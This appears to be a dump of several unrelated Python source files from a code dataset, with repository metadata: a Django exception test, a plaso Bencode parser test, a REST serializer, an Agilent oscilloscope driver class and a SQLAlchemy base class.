class ThumbnailPageNotFoundErrorTest(SimpleTestCase):
"""Test class for ThumbnailPageNotFoundError error.
Note: Tests to check if these were raised appropriately
are located where this exception is used.
"""
def test_attributes(self):
generator = Mock()
generator.__class__.__name__ = "Name"
exception = ThumbnailPageNotFoundError(generator)
self.assertEqual(exception.generator_name, "Name")
def test_string(self):
generator = Mock()
generator.__class__.__name__ = "Name"
exception = ThumbnailPageNotFoundError(generator)
self.assertEqual(
exception.__str__(),
"Name did not return a page with a designated thumbnail."
)
| [
"[email protected]"
] | |
26a4deb38675a8c8a8ed12f89b75937b21c93aec | 62e240f67cd8f92ef41ce33dafdb38436f5a9c14 | /tests/parsers/bencode_parser.py | f012685073c77212fcc29cb216201a18d37e4779 | [
"Apache-2.0"
] | permissive | joshlemon/plaso | 5eb434772fa1037f22b10fa1bda3c3cc83183c3a | 9f8e05f21fa23793bfdade6af1d617e9dd092531 | refs/heads/master | 2022-10-14T18:29:57.211910 | 2020-06-08T13:08:31 | 2020-06-08T13:08:31 | 270,702,592 | 1 | 0 | Apache-2.0 | 2020-06-08T14:36:56 | 2020-06-08T14:36:56 | null | UTF-8 | Python | false | false | 839 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Tests for the Bencode file parser."""
from __future__ import unicode_literals
import unittest
from plaso.parsers import bencode_parser
# Register all plugins.
from plaso.parsers import bencode_plugins # pylint: disable=unused-import
from tests.parsers import test_lib
class BencodeTest(test_lib.ParserTestCase):
"""Tests for the Bencode file parser."""
# pylint: disable=protected-access
def testEnablePlugins(self):
"""Tests the EnablePlugins function."""
parser = bencode_parser.BencodeParser()
parser.EnablePlugins(['bencode_transmission'])
self.assertIsNotNone(parser)
self.assertIsNone(parser._default_plugin)
self.assertNotEqual(parser._plugins, [])
self.assertEqual(len(parser._plugins), 1)
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
3d82aea556022fc260397c29a753c5ffa68f69ad | 815f70b6a6e1c58676de2def893baf4f70b0f72c | /apps/restapi/twee/serializers/tip.py | 54ce2848966860f92faa422cc2ccd5e4a37a538b | [
"MIT"
] | permissive | adepeter/pythondailytip | ed6e25578f84c985eea048f4bc711b411cdc4eff | 8b114b68d417e7631d139f1ee2267f6f0e061cdf | refs/heads/main | 2023-05-30T11:07:57.452009 | 2021-06-11T13:42:19 | 2021-06-11T13:42:19 | 375,838,410 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 303 | py | from rest_framework import serializers
from ....twee.models import PythonTip
class TipSerializer(serializers.ModelSerializer):
class Meta:
model = PythonTip
fields = '__all__'
extra_kwargs = {
'tip': {
'max_length': 140
}
}
| [
"[email protected]"
] | |
6f8c5602cdedb6aeec199294867b756d7b4aef58 | 372647ad5f8a40754116c2b79914708e46960aef | /ivi/agilent/agilentMSOX3024A.py | 612461f32a85d96ab8c7187f5deb332e6e19ab84 | [
"MIT"
] | permissive | edupo/python-ivi | 52392decb01bc89c6e1b42cbcbd1295a131e91f5 | 8105d8064503725dde781f0378d75db58defaecb | refs/heads/master | 2020-03-31T21:06:02.059885 | 2018-10-04T12:34:38 | 2018-10-04T12:34:38 | 152,567,486 | 0 | 0 | MIT | 2018-10-11T09:40:35 | 2018-10-11T09:40:32 | Python | UTF-8 | Python | false | false | 1,695 | py | """
Python Interchangeable Virtual Instrument Library
Copyright (c) 2012-2016 Alex Forencich
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
from .agilent3000A import *
class agilentMSOX3024A(agilent3000A):
"Agilent InfiniiVision MSOX3024A IVI oscilloscope driver"
def __init__(self, *args, **kwargs):
self.__dict__.setdefault('_instrument_id', 'MSO-X 3024A')
super(agilentMSOX3024A, self).__init__(*args, **kwargs)
self._analog_channel_count = 4
self._digital_channel_count = 16
self._channel_count = self._analog_channel_count + self._digital_channel_count
self._bandwidth = 200e6
self._init_channels()
| [
"[email protected]"
] | |
ef082f9bb3bf1cae4397163bfce43ab59d77dfac | 90e6860b5370b742f01c0664ac84f14dc1272155 | /examples/helloZiggurat/src/ziggHello/models/zigguratTest/ZigguratTestBase.py | 6f82ebfb51611a2d85ce9a0b6f6c0667be506880 | [] | no_license | sernst/Ziggurat | e63f876b8f2cb3f78c7a7a4dcf79af810a540722 | 4ae09bbd9c467b2ad740e117ed00354c04951e22 | refs/heads/master | 2021-01-17T07:20:17.138440 | 2016-05-27T14:27:43 | 2016-05-27T14:27:43 | 9,278,283 | 6 | 1 | null | null | null | null | UTF-8 | Python | false | false | 530 | py | # ZigguratTestBase.py
# (C)2013
# Scott Ernst
from ziggurat.sqlalchemy.ZigguratModelsBase import ZigguratModelsBase
#___________________________________________________________________________________________________ ZigguratTestBase
class ZigguratTestBase(ZigguratModelsBase):
"""A class for..."""
#===================================================================================================
# C L A S S
__abstract__ = True
| [
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.